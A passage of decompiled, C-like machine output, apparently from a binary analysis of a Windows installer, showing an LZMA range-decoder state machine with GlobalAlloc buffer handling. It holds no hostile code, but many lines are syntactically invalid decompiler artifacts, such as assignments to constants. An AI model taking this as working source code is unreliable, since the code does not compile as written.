                          											 *(_t613 - 4) = _t534;
                          											if(_t534 == 0) {
                          												goto L171;
                          											} else {
                          												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                          												goto L10;
                          											}
                          										case 1:
                          											L13:
                          											__eflags =  *(_t613 - 0x6c);
                          											if( *(_t613 - 0x6c) == 0) {
                          												 *(_t613 - 0x88) = 1;
                          												goto L170;
                          											}
                          											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                          											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                          											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                          											_t45 = _t613 - 0x48;
                          											 *_t45 =  *(_t613 - 0x48) + 1;
                          											__eflags =  *_t45;
                          											L15:
                          											if( *(_t613 - 0x48) < 4) {
                          												goto L13;
                          											}
                          											_t546 =  *(_t613 - 0x40);
                          											if(_t546 ==  *(_t613 - 0x74)) {
                          												L20:
                          												 *(_t613 - 0x48) = 5;
                          												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                          												goto L23;
                          											}
                          											 *(_t613 - 0x74) = _t546;
                          											if( *(_t613 - 8) != 0) {
                          												GlobalFree( *(_t613 - 8));
                          											}
                          											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                          											 *(_t613 - 8) = _t534;
                          											if(_t534 == 0) {
                          												goto L171;
                          											} else {
                          												goto L20;
                          											}
                          										case 2:
                          											L24:
                          											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                          											 *(_t613 - 0x84) = 6;
                          											 *(_t613 - 0x4c) = _t553;
                          											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
                          											 *(_t613 - 0x54) = _t606;
                          											goto L133;
                          										case 3:
                          											L21:
                          											__eflags =  *(_t613 - 0x6c);
                          											if( *(_t613 - 0x6c) == 0) {
                          												 *(_t613 - 0x88) = 3;
                          												goto L170;
                          											}
                          											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                          											_t67 = _t613 - 0x70;
                          											 *_t67 =  &(( *(_t613 - 0x70))[1]);
                          											__eflags =  *_t67;
                          											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                          											L23:
                          											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                          											if( *(_t613 - 0x48) != 0) {
                          												goto L21;
                          											}
                          											goto L24;
                          										case 4:
                          											L133:
                          											_t531 =  *_t606;
                          											_t589 = _t531 & 0x0000ffff;
                          											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                          											if( *(_t613 - 0xc) >= _t565) {
                          												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                          												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                          												 *(_t613 - 0x40) = 1;
                          												_t532 = _t531 - (_t531 >> 5);
                          												 *_t606 = _t532;
                          											} else {
                          												 *(_t613 - 0x10) = _t565;
                          												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                          												 *_t606 = (0x800 - _t589 >> 5) + _t531;
                          											}
                          											if( *(_t613 - 0x10) >= 0x1000000) {
                          												goto L139;
                          											}
                          										case 5:
                          											goto L137;
                          										case 6:
                          											__edx = 0;
                          											__eflags =  *(__ebp - 0x40);
                          											if( *(__ebp - 0x40) != 0) {
                          												__eax =  *(__ebp - 4);
                          												__ecx =  *(__ebp - 0x38);
                          												 *(__ebp - 0x34) = 1;
                          												 *(__ebp - 0x84) = 7;
                          												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                          												while(1) {
                          													 *(_t613 - 0x54) = _t606;
                          													goto L133;
                          												}
                          											}
                          											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                          											__esi =  *(__ebp - 0x60);
                          											__cl = 8;
                          											__cl = 8 -  *(__ebp - 0x3c);
                          											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                          											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                          											__ecx =  *(__ebp - 0x3c);
                          											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                          											__ecx =  *(__ebp - 4);
                          											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                          											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                          											__eflags =  *(__ebp - 0x38) - 4;
                          											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                          											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                          											if( *(__ebp - 0x38) >= 4) {
                          												__eflags =  *(__ebp - 0x38) - 0xa;
                          												if( *(__ebp - 0x38) >= 0xa) {
                          													_t98 = __ebp - 0x38;
                          													 *_t98 =  *(__ebp - 0x38) - 6;
                          													__eflags =  *_t98;
                          												} else {
                          													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                          												}
                          											} else {
                          												 *(__ebp - 0x38) = 0;
                          											}
                          											__eflags =  *(__ebp - 0x34) - __edx;
                          											if( *(__ebp - 0x34) == __edx) {
                          												__ebx = 0;
                          												__ebx = 1;
                          												goto L61;
                          											} else {
                          												__eax =  *(__ebp - 0x14);
                          												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                          												__eflags = __eax -  *(__ebp - 0x74);
                          												if(__eax >=  *(__ebp - 0x74)) {
                          													__eax = __eax +  *(__ebp - 0x74);
                          													__eflags = __eax;
                          												}
                          												__ecx =  *(__ebp - 8);
                          												__ebx = 0;
                          												__ebx = 1;
                          												__al =  *((intOrPtr*)(__eax + __ecx));
                          												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                          												goto L41;
                          											}
                          										case 7:
                          											__eflags =  *(__ebp - 0x40) - 1;
                          											if( *(__ebp - 0x40) != 1) {
                          												__eax =  *(__ebp - 0x24);
                          												 *(__ebp - 0x80) = 0x16;
                          												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                          												__eax =  *(__ebp - 0x28);
                          												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                          												__eax =  *(__ebp - 0x2c);
                          												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                          												__eax = 0;
                          												__eflags =  *(__ebp - 0x38) - 7;
                          												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                          												__al = __al & 0x000000fd;
                          												__eax = (__eflags >= 0) - 1 + 0xa;
                          												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                          												__eax =  *(__ebp - 4);
                          												__eax =  *(__ebp - 4) + 0x664;
                          												__eflags = __eax;
                          												 *(__ebp - 0x58) = __eax;
                          												goto L69;
                          											}
                          											__eax =  *(__ebp - 4);
                          											__ecx =  *(__ebp - 0x38);
                          											 *(__ebp - 0x84) = 8;
                          											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                          											while(1) {
                          												 *(_t613 - 0x54) = _t606;
                          												goto L133;
                          											}
                          										case 8:
                          											goto L0;
                          										case 9:
                          											__eflags =  *(__ebp - 0x40);
                          											if( *(__ebp - 0x40) != 0) {
                          												goto L89;
                          											}
                          											__eflags =  *(__ebp - 0x60);
                          											if( *(__ebp - 0x60) == 0) {
                          												goto L171;
                          											}
                          											__eax = 0;
                          											__eflags =  *(__ebp - 0x38) - 7;
                          											_t258 =  *(__ebp - 0x38) - 7 >= 0;
                          											__eflags = _t258;
                          											0 | _t258 = _t258 + _t258 + 9;
                          											 *(__ebp - 0x38) = _t258 + _t258 + 9;
                          											goto L75;
                          										case 0xa:
                          											__eflags =  *(__ebp - 0x40);
                          											if( *(__ebp - 0x40) != 0) {
                          												__eax =  *(__ebp - 4);
                          												__ecx =  *(__ebp - 0x38);
                          												 *(__ebp - 0x84) = 0xb;
                          												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                          												while(1) {
                          													 *(_t613 - 0x54) = _t606;
                          													goto L133;
                          												}
                          											}
                          											__eax =  *(__ebp - 0x28);
                          											goto L88;
                          										case 0xb:
                          											__eflags =  *(__ebp - 0x40);
                          											if( *(__ebp - 0x40) != 0) {
                          												__ecx =  *(__ebp - 0x24);
                          												__eax =  *(__ebp - 0x20);
                          												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                          											} else {
                          												__eax =  *(__ebp - 0x24);
                          											}
                          											__ecx =  *(__ebp - 0x28);
                          											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                          											L88:
                          											__ecx =  *(__ebp - 0x2c);
                          											 *(__ebp - 0x2c) = __eax;
                          											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                          											L89:
                          											__eax =  *(__ebp - 4);
                          											 *(__ebp - 0x80) = 0x15;
                          											__eax =  *(__ebp - 4) + 0xa68;
                          											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                          											goto L69;
                          										case 0xc:
                          											L99:
                          											__eflags =  *(__ebp - 0x6c);
                          											if( *(__ebp - 0x6c) == 0) {
                          												 *(__ebp - 0x88) = 0xc;
                          												goto L170;
                          											}
                          											__ecx =  *(__ebp - 0x70);
                          											__eax =  *(__ebp - 0xc);
                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											_t334 = __ebp - 0x70;
                          											 *_t334 =  *(__ebp - 0x70) + 1;
                          											__eflags =  *_t334;
                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											__eax =  *(__ebp - 0x2c);
                          											goto L101;
                          										case 0xd:
                          											L37:
                          											__eflags =  *(__ebp - 0x6c);
                          											if( *(__ebp - 0x6c) == 0) {
                          												 *(__ebp - 0x88) = 0xd;
                          												goto L170;
                          											}
                          											__ecx =  *(__ebp - 0x70);
                          											__eax =  *(__ebp - 0xc);
                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											_t122 = __ebp - 0x70;
                          											 *_t122 =  *(__ebp - 0x70) + 1;
                          											__eflags =  *_t122;
                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											L39:
                          											__eax =  *(__ebp - 0x40);
                          											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                          											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                          												goto L48;
                          											}
                          											__eflags = __ebx - 0x100;
                          											if(__ebx >= 0x100) {
                          												goto L54;
                          											}
                          											L41:
                          											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                          											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                          											__ecx =  *(__ebp - 0x58);
                          											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                          											 *(__ebp - 0x48) = __eax;
                          											__eax = __eax + 1;
                          											__eax = __eax << 8;
                          											__eax = __eax + __ebx;
                          											__esi =  *(__ebp - 0x58) + __eax * 2;
                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                          											__ax =  *__esi;
                          											 *(__ebp - 0x54) = __esi;
                          											__edx = __ax & 0x0000ffff;
                          											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                          											__eflags =  *(__ebp - 0xc) - __ecx;
                          											if( *(__ebp - 0xc) >= __ecx) {
                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                          												__cx = __ax;
                          												 *(__ebp - 0x40) = 1;
                          												__cx = __ax >> 5;
                          												__eflags = __eax;
                          												__ebx = __ebx + __ebx + 1;
                          												 *__esi = __ax;
                          											} else {
                          												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                          												 *(__ebp - 0x10) = __ecx;
                          												0x800 = 0x800 - __edx;
                          												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                          												__ebx = __ebx + __ebx;
                          												 *__esi = __cx;
                          											}
                          											__eflags =  *(__ebp - 0x10) - 0x1000000;
                          											 *(__ebp - 0x44) = __ebx;
                          											if( *(__ebp - 0x10) >= 0x1000000) {
                          												goto L39;
                          											} else {
                          												goto L37;
                          											}
                          										case 0xe:
                          											L46:
                          											__eflags =  *(__ebp - 0x6c);
                          											if( *(__ebp - 0x6c) == 0) {
                          												 *(__ebp - 0x88) = 0xe;
                          												goto L170;
                          											}
                          											__ecx =  *(__ebp - 0x70);
                          											__eax =  *(__ebp - 0xc);
                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											_t156 = __ebp - 0x70;
                          											 *_t156 =  *(__ebp - 0x70) + 1;
                          											__eflags =  *_t156;
                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											while(1) {
                          												L48:
                          												__eflags = __ebx - 0x100;
                          												if(__ebx >= 0x100) {
                          													break;
                          												}
                          												__eax =  *(__ebp - 0x58);
                          												__edx = __ebx + __ebx;
                          												__ecx =  *(__ebp - 0x10);
                          												__esi = __edx + __eax;
                          												__ecx =  *(__ebp - 0x10) >> 0xb;
                          												__ax =  *__esi;
                          												 *(__ebp - 0x54) = __esi;
                          												__edi = __ax & 0x0000ffff;
                          												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                          												__eflags =  *(__ebp - 0xc) - __ecx;
                          												if( *(__ebp - 0xc) >= __ecx) {
                          													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                          													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                          													__cx = __ax;
                          													_t170 = __edx + 1; // 0x1
                          													__ebx = _t170;
                          													__cx = __ax >> 5;
                          													__eflags = __eax;
                          													 *__esi = __ax;
                          												} else {
                          													 *(__ebp - 0x10) = __ecx;
                          													0x800 = 0x800 - __edi;
                          													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                          													__ebx = __ebx + __ebx;
                          													 *__esi = __cx;
                          												}
                          												__eflags =  *(__ebp - 0x10) - 0x1000000;
                          												 *(__ebp - 0x44) = __ebx;
                          												if( *(__ebp - 0x10) >= 0x1000000) {
                          													continue;
                          												} else {
                          													goto L46;
                          												}
                          											}
                          											L54:
                          											_t173 = __ebp - 0x34;
                          											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                          											__eflags =  *_t173;
                          											goto L55;
                          										case 0xf:
                          											L58:
                          											__eflags =  *(__ebp - 0x6c);
                          											if( *(__ebp - 0x6c) == 0) {
                          												 *(__ebp - 0x88) = 0xf;
                          												goto L170;
                          											}
                          											__ecx =  *(__ebp - 0x70);
                          											__eax =  *(__ebp - 0xc);
                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											_t203 = __ebp - 0x70;
                          											 *_t203 =  *(__ebp - 0x70) + 1;
                          											__eflags =  *_t203;
                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											L60:
                          											__eflags = __ebx - 0x100;
                          											if(__ebx >= 0x100) {
                          												L55:
                          												__al =  *(__ebp - 0x44);
                          												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                          												goto L56;
                          											}
                          											L61:
                          											__eax =  *(__ebp - 0x58);
                          											__edx = __ebx + __ebx;
                          											__ecx =  *(__ebp - 0x10);
                          											__esi = __edx + __eax;
                          											__ecx =  *(__ebp - 0x10) >> 0xb;
                          											__ax =  *__esi;
                          											 *(__ebp - 0x54) = __esi;
                          											__edi = __ax & 0x0000ffff;
                          											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                          											__eflags =  *(__ebp - 0xc) - __ecx;
                          											if( *(__ebp - 0xc) >= __ecx) {
                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                          												__cx = __ax;
                          												_t217 = __edx + 1; // 0x1
                          												__ebx = _t217;
                          												__cx = __ax >> 5;
                          												__eflags = __eax;
                          												 *__esi = __ax;
                          											} else {
                          												 *(__ebp - 0x10) = __ecx;
                          												0x800 = 0x800 - __edi;
                          												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                          												__ebx = __ebx + __ebx;
                          												 *__esi = __cx;
                          											}
                          											__eflags =  *(__ebp - 0x10) - 0x1000000;
                          											 *(__ebp - 0x44) = __ebx;
                          											if( *(__ebp - 0x10) >= 0x1000000) {
                          												goto L60;
                          											} else {
                          												goto L58;
                          											}
                          										case 0x10:
                          											L109:
                          											__eflags =  *(__ebp - 0x6c);
                          											if( *(__ebp - 0x6c) == 0) {
                          												 *(__ebp - 0x88) = 0x10;
                          												goto L170;
                          											}
                          											__ecx =  *(__ebp - 0x70);
                          											__eax =  *(__ebp - 0xc);
                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											_t365 = __ebp - 0x70;
                          											 *_t365 =  *(__ebp - 0x70) + 1;
                          											__eflags =  *_t365;
                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											goto L111;
                          										case 0x11:
                          											L69:
                          											__esi =  *(__ebp - 0x58);
                          											 *(__ebp - 0x84) = 0x12;
                          											while(1) {
                          												 *(_t613 - 0x54) = _t606;
                          												goto L133;
                          											}
                          										case 0x12:
                          											__eflags =  *(__ebp - 0x40);
                          											if( *(__ebp - 0x40) != 0) {
                          												__eax =  *(__ebp - 0x58);
                          												 *(__ebp - 0x84) = 0x13;
                          												__esi =  *(__ebp - 0x58) + 2;
                          												while(1) {
                          													 *(_t613 - 0x54) = _t606;
                          													goto L133;
                          												}
                          											}
                          											__eax =  *(__ebp - 0x4c);
                          											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                          											__ecx =  *(__ebp - 0x58);
                          											__eax =  *(__ebp - 0x4c) << 4;
                          											__eflags = __eax;
                          											__eax =  *(__ebp - 0x58) + __eax + 4;
                          											goto L130;
                          										case 0x13:
                          											__eflags =  *(__ebp - 0x40);
                          											if( *(__ebp - 0x40) != 0) {
                          												_t469 = __ebp - 0x58;
                          												 *_t469 =  *(__ebp - 0x58) + 0x204;
                          												__eflags =  *_t469;
                          												 *(__ebp - 0x30) = 0x10;
                          												 *(__ebp - 0x40) = 8;
                          												L144:
                          												 *(__ebp - 0x7c) = 0x14;
                          												goto L145;
                          											}
                          											__eax =  *(__ebp - 0x4c);
                          											__ecx =  *(__ebp - 0x58);
                          											__eax =  *(__ebp - 0x4c) << 4;
                          											 *(__ebp - 0x30) = 8;
                          											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                          											L130:
                          											 *(__ebp - 0x58) = __eax;
                          											 *(__ebp - 0x40) = 3;
                          											goto L144;
                          										case 0x14:
                          											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                          											__eax =  *(__ebp - 0x80);
                          											 *(_t613 - 0x88) = _t533;
                          											goto L1;
                          										case 0x15:
                          											__eax = 0;
                          											__eflags =  *(__ebp - 0x38) - 7;
                          											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                          											__al = __al & 0x000000fd;
                          											__eax = (__eflags >= 0) - 1 + 0xb;
                          											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                          											goto L120;
                          										case 0x16:
                          											__eax =  *(__ebp - 0x30);
                          											__eflags = __eax - 4;
                          											if(__eax >= 4) {
                          												_push(3);
                          												_pop(__eax);
                          											}
                          											__ecx =  *(__ebp - 4);
                          											 *(__ebp - 0x40) = 6;
                          											__eax = __eax << 7;
                          											 *(__ebp - 0x7c) = 0x19;
                          											 *(__ebp - 0x58) = __eax;
                          											goto L145;
                          										case 0x17:
                          											L145:
                          											__eax =  *(__ebp - 0x40);
                          											 *(__ebp - 0x50) = 1;
                          											 *(__ebp - 0x48) =  *(__ebp - 0x40);
                          											goto L149;
                          										case 0x18:
                          											L146:
                          											__eflags =  *(__ebp - 0x6c);
                          											if( *(__ebp - 0x6c) == 0) {
                          												 *(__ebp - 0x88) = 0x18;
                          												goto L170;
                          											}
                          											__ecx =  *(__ebp - 0x70);
                          											__eax =  *(__ebp - 0xc);
                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											_t484 = __ebp - 0x70;
                          											 *_t484 =  *(__ebp - 0x70) + 1;
                          											__eflags =  *_t484;
                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											L148:
                          											_t487 = __ebp - 0x48;
                          											 *_t487 =  *(__ebp - 0x48) - 1;
                          											__eflags =  *_t487;
                          											L149:
                          											__eflags =  *(__ebp - 0x48);
                          											if( *(__ebp - 0x48) <= 0) {
                          												__ecx =  *(__ebp - 0x40);
                          												__ebx =  *(__ebp - 0x50);
                          												0 = 1;
                          												__eax = 1 << __cl;
                          												__ebx =  *(__ebp - 0x50) - (1 << __cl);
                          												__eax =  *(__ebp - 0x7c);
                          												 *(__ebp - 0x44) = __ebx;
                          												while(1) {
                          													 *(_t613 - 0x88) = _t533;
                          													goto L1;
                          												}
                          											}
                          											__eax =  *(__ebp - 0x50);
                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                          											__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                          											__eax =  *(__ebp - 0x58);
                          											__esi = __edx + __eax;
                          											 *(__ebp - 0x54) = __esi;
                          											__ax =  *__esi;
                          											__edi = __ax & 0x0000ffff;
                          											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                          											__eflags =  *(__ebp - 0xc) - __ecx;
                          											if( *(__ebp - 0xc) >= __ecx) {
                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                          												__cx = __ax;
                          												__cx = __ax >> 5;
                          												__eax = __eax - __ecx;
                          												__edx = __edx + 1;
                          												__eflags = __edx;
                          												 *__esi = __ax;
                          												 *(__ebp - 0x50) = __edx;
                          											} else {
                          												 *(__ebp - 0x10) = __ecx;
                          												0x800 = 0x800 - __edi;
                          												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                          												 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                          												 *__esi = __cx;
                          											}
                          											__eflags =  *(__ebp - 0x10) - 0x1000000;
                          											if( *(__ebp - 0x10) >= 0x1000000) {
                          												goto L148;
                          											} else {
                          												goto L146;
                          											}
                          										case 0x19:
                          											__eflags = __ebx - 4;
                          											if(__ebx < 4) {
                          												 *(__ebp - 0x2c) = __ebx;
                          												L119:
                          												_t393 = __ebp - 0x2c;
                          												 *_t393 =  *(__ebp - 0x2c) + 1;
                          												__eflags =  *_t393;
                          												L120:
                          												__eax =  *(__ebp - 0x2c);
                          												__eflags = __eax;
                          												if(__eax == 0) {
                          													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                          													goto L170;
                          												}
                          												__eflags = __eax -  *(__ebp - 0x60);
                          												if(__eax >  *(__ebp - 0x60)) {
                          													goto L171;
                          												}
                          												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                          												__eax =  *(__ebp - 0x30);
                          												_t400 = __ebp - 0x60;
                          												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                          												__eflags =  *_t400;
                          												goto L123;
                          											}
                          											__ecx = __ebx;
                          											__eax = __ebx;
                          											__ecx = __ebx >> 1;
                          											__eax = __ebx & 0x00000001;
                          											__ecx = (__ebx >> 1) - 1;
                          											__al = __al | 0x00000002;
                          											__eax = (__ebx & 0x00000001) << __cl;
                          											__eflags = __ebx - 0xe;
                          											 *(__ebp - 0x2c) = __eax;
                          											if(__ebx >= 0xe) {
                          												__ebx = 0;
                          												 *(__ebp - 0x48) = __ecx;
                          												L102:
                          												__eflags =  *(__ebp - 0x48);
                          												if( *(__ebp - 0x48) <= 0) {
                          													__eax = __eax + __ebx;
                          													 *(__ebp - 0x40) = 4;
                          													 *(__ebp - 0x2c) = __eax;
                          													__eax =  *(__ebp - 4);
                          													__eax =  *(__ebp - 4) + 0x644;
                          													__eflags = __eax;
                          													L108:
                          													__ebx = 0;
                          													 *(__ebp - 0x58) = __eax;
                          													 *(__ebp - 0x50) = 1;
                          													 *(__ebp - 0x44) = 0;
                          													 *(__ebp - 0x48) = 0;
                          													L112:
                          													__eax =  *(__ebp - 0x40);
                          													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                          													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                          														_t391 = __ebp - 0x2c;
                          														 *_t391 =  *(__ebp - 0x2c) + __ebx;
                          														__eflags =  *_t391;
                          														goto L119;
                          													}
                          													__eax =  *(__ebp - 0x50);
                          													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                          													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                          													__eax =  *(__ebp - 0x58);
                          													__esi = __edi + __eax;
                          													 *(__ebp - 0x54) = __esi;
                          													__ax =  *__esi;
                          													__ecx = __ax & 0x0000ffff;
                          													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                          													__eflags =  *(__ebp - 0xc) - __edx;
                          													if( *(__ebp - 0xc) >= __edx) {
                          														__ecx = 0;
                          														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                          														__ecx = 1;
                          														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                          														__ebx = 1;
                          														__ecx =  *(__ebp - 0x48);
                          														__ebx = 1 << __cl;
                          														__ecx = 1 << __cl;
                          														__ebx =  *(__ebp - 0x44);
                          														__ebx =  *(__ebp - 0x44) | __ecx;
                          														__cx = __ax;
                          														__cx = __ax >> 5;
                          														__eax = __eax - __ecx;
                          														__edi = __edi + 1;
                          														__eflags = __edi;
                          														 *(__ebp - 0x44) = __ebx;
                          														 *__esi = __ax;
                          														 *(__ebp - 0x50) = __edi;
                          													} else {
                          														 *(__ebp - 0x10) = __edx;
                          														0x800 = 0x800 - __ecx;
                          														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                          														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                          														 *__esi = __dx;
                          													}
                          													__eflags =  *(__ebp - 0x10) - 0x1000000;
                          													if( *(__ebp - 0x10) >= 0x1000000) {
                          														L111:
                          														_t368 = __ebp - 0x48;
                          														 *_t368 =  *(__ebp - 0x48) + 1;
                          														__eflags =  *_t368;
                          														goto L112;
                          													} else {
                          														goto L109;
                          													}
                          												}
                          												__ecx =  *(__ebp - 0xc);
                          												__ebx = __ebx + __ebx;
                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
